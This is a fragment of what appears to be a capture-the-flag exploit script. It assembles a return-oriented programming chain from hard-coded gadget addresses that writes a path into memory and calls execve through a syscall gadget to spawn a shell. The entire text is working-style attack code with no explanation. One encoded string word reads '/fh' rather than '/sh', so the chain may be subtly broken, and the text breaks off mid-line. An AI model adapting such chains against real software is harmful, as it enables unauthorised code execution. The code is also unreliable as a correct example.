payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x45d070)+p64(0x4352bd)
# 0x00000000004352bd: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x44cd96)
# 0x44cd96: xchg ecx, eax ; retf 0
payload += p32(0x440d84)+p32(0x33)
# 0x0000000000440d84: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x45d074)+p64(0x4352bd)
# 0x00000000004352bd: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x44cd96)
# 0x44cd96: xchg ecx, eax ; retf 0
payload += p32(0x440d84)+p32(0x33)
# 0x0000000000440d84: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x45d070)+p64(0x4352bd)
# 0x00000000004352bd: pop rcx; ret; 
payload += p64(0x3b)+p64(0x44cd96)
# 0x44cd96: xchg ecx, eax ; retf 0
payload += p32(0x4352bd)+p32(0x33)
# 0x00000000004352bd: pop rcx; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x41c049)
# 0x000000000041c049: mov edx, ecx; syscall; ret; 
payload +=
